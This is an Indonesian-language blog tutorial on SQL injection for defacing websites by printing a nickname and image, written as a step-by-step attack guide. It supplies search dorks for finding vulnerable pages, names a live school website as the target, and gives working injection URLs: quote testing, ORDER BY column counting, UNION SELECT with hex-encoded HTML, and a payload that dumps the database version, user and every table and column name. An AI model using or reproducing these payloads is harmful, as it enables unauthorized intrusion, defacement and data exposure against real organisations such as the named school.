Hallo Minna :v
Kembali Lagi Dengan Gw Si Tampan Zaky :v
Lama Ga Upload Gegara Gaada Kuota,Kuota Dari Pemerintah Juga Ga Sampe Sampe :v Kemaren Juga Cuma Ada Paket Chat Doang Walaupun Gaada Yang Chat :( Tapi Alhamdulilah Sekarang Dah Ada. Langsung Bahas Aja Ya Kan
Kali Ini Kita Bahas Tutorial Cara Sqli Print Nick Ama Gambar Aja Ya :v
Pertama Kita Harus Tahu Apa Itu SQL INJECTIOM ? SQL INJECTION Adalah Teknik Injeksi Kode, Digunakan Untuk Menyerang Aplikasi Berbasis Data Serangan SQL INJECTIOJ Memungkinkan Penyerang Untuk Memalsukan Identitas, Merusak Data Yang Ada, Menyebabkan Masalah Penolakan Seperti Membatalkan Transaksi Atau mengubah Saldo, Memungkinkan Pengungkapan Lengkap Semua Data Di Sistem Menghancurkan Data Dan Menjadi Administrator Dari Server Database.
Gimana ? Paham Kan Lanjut Langsung Ke Tutorial Nya Aja :v
Dork :
Inurl:/gallery.php?id=
Inurl:/news.php?id=
Use Your Brain Sob :v Kembangin Lagi
Disini Gw Dah Dapet Target Dari Temen Gw :v Jadi Langsung Aja
Live Target : http://www.lifecommunityschool.sch.id/gallery.php?k9
1. Cek Vuln Web
Pertama Kita Cek Web Tersebut Vuln Atao Tidak Dengan Diberi Tanda Petik (')
Ciri Ciri Web Vuln Sqli Seperti Blank Putih (Kosong) , Tampilan Yang Beda Dari Sebelum Nya , Gambar Dan Tulisan Hilang , Dan Lain Lain
Contoh : http://www.lifecommunityschool.sch.id/gallery.php?k9'
Dan Web Tersebut Vuln Tampilan Nya Berbeda Dari Yang Awal
2.Mencari Jumlah Tabel ( Order By )
Oke Ditahap Ini Kita Akan Memberikan Perintah "order by" Ini Kita Cari Terus Sampai Tampilan Berubah
http://www.lifecommumityschool.sch.id/gallery.php?k9'order by 1-- - ( Kembali Normal )
http://www.lifecommunityschool.sch.id/gallery.php?k9'order by 2-- - ( Normal )
http://www.lifecommunityschool.sch.id/gallery.php?k9'order by 3-- - ( Normal )
http://www.lifecommunityschool.sch.id/gallery.php?k9'order by 4-- - ( Normal )
http://www.lifecommunityschool.sch.id/gallery.php?k9'order by 5-- - ( Berubah Bentuk Atao Error )
Nah Berarti Jumlah Tabel Atao Column Nya Hanya 4
3.Mencari Union SelectSebelumnya, kita sudah mengetahui jumlah tabel/column nya, selanjutnya kita melakukan tahap mencari angka emas nya,bagaimana cara nya ? kita ganti kata "order by" menjadi "union select" dan menambahkan jumlah tabel/columns di atas dari "1" sampai "jumlah tabel" dan jangan lupa menambahkan tanda "-" di awal parameter, Oke langsung saja ( Jika kurang paham bisa komentar di bawah )
http://www.lifecommunityschool.sch.id/gallery.php?k=-9'union select 1,2,3,4-- -
Disini Muncul Union Select Nya 3 Ama 4
4. Print Nama Dan Gambar
Pertama, kalian ubah dulu teks kalian menjadi hex Bebas kalian tulis apa aja setelah selesai pencet "Hex Encode!"
Klik Disini Sob
Disini Gw Nulis "Injected By Zaky Aziz" Dan Di Hex Menjadi "496E6A6563746564204279205A616B7920417A697A"
Oke Pertama Kita Coba Print Nama Oiya Jan Lupa Kalian Kasih "0x" Di Awal Hex Menjadi "0x496E6A6563746564204279205A616B7920417A697A" Langsung Aja Print Nama, Cara nya ? Kita Ganti Union Select Yang Tadi Menjadi Hex.
Gw Ganti Angka 3 Jadi Hex
Hasil Nya :
http://www.lifecommunityschool.sch.id/gallery.php?k=-9'union select 1,2,concat+(0x496E6A6563746564204279205A616B7920417A697A),4-- -
Oke lanjut ke print gambar nya, caranya ? kita tambahkan <img src="link.com/gambar.jpg">
contoh : <img src="https://a.top4top.io/p_1732uf6op0.jpg"> dan kita dapat mengatur ukuran panjang dan lebar nya dengan cara menambah "width dan height" ( tag html )
contoh : <img src="https://a.top4top.io/p_1732uf6op0.jpg" width="200" heigth="200"> kita gabungkan dengan "INJECT BY ZakyAziz" bisa kalian ubah menjadi keren dengan menggunakan "tag html", Oke langsung aja ke intinya, disini saya sudah membuat print gambar dan nama + tag html
Punya Gw :
<center> <img src="https://a.top4top.io/p_1732uf6op0.jpg" width="200" heigth="200"><br><font size="5" color="lime">INJECT BY<br>Zaky Aziz</font><center>
dan jangan lupa untuk di hex, dan menjadi : "(0x3C63656E7465723E203C696D67207372633D2268747470733A2F2F612E746F7034746F702E696F2F705F313733327566366F70302E6A7067222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E5A616B79417A697A3C2F666F6E743E3C63656E7465723E)
Kita ganti angka 3 menjadi bilangan hex diatas menjadi :
http://www.lifecommunityschool.sch.id/gallery.php?k=-9'union select 1,2,Concat+(0x3C63656E7465723E203C696D67207372633D2268747470733A2F2F612E746F7034746F702E696F2F705F313733327566366F70302E6A7067222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E5A616B79417A697A3C2F666F6E743E3C63656E7465723E),4-- -
Jika Kalian Ingin Menambahkan Versi Database
Bisa Kalian Tambahkan Sesudah Bilangan Hex
Contoh :
http://www.lifecommunityschool.sch.id/gallery.php?k=-9'union select 1,2,Concat+(0x3C63656E7465723E203C696D67207372633D2268747470733A2F2F612E746F7034746F702E696F2F705F313733327566366F70302E6A7067222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E5A616B79417A697A3C2F666F6E743E3C63656E7465723E,'<br>','<font color=%22orange%22>','Versi :: ','</font>',version(),'<br>','<font color=%22orange%22>','User :: ','</font>',user(),'<br>','<font color=%22orange%22>','Database :: ','</font>',database(),'<br>',(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ',' %C2%A0:: %C2%A0','<font color=blue size=3>',column_name))),@)))),4-- -
Hasil Nya :D :
Oke Sekian Dari Gw Kalo Ada Yang Salah Atao Kurang Paham Kalian Bisa Tulis Di Komen :D
Mungkin Itu Aja Tutorial Dari Gw Request Tutorial Bisa Kalian Tulis Aja Di Komen :D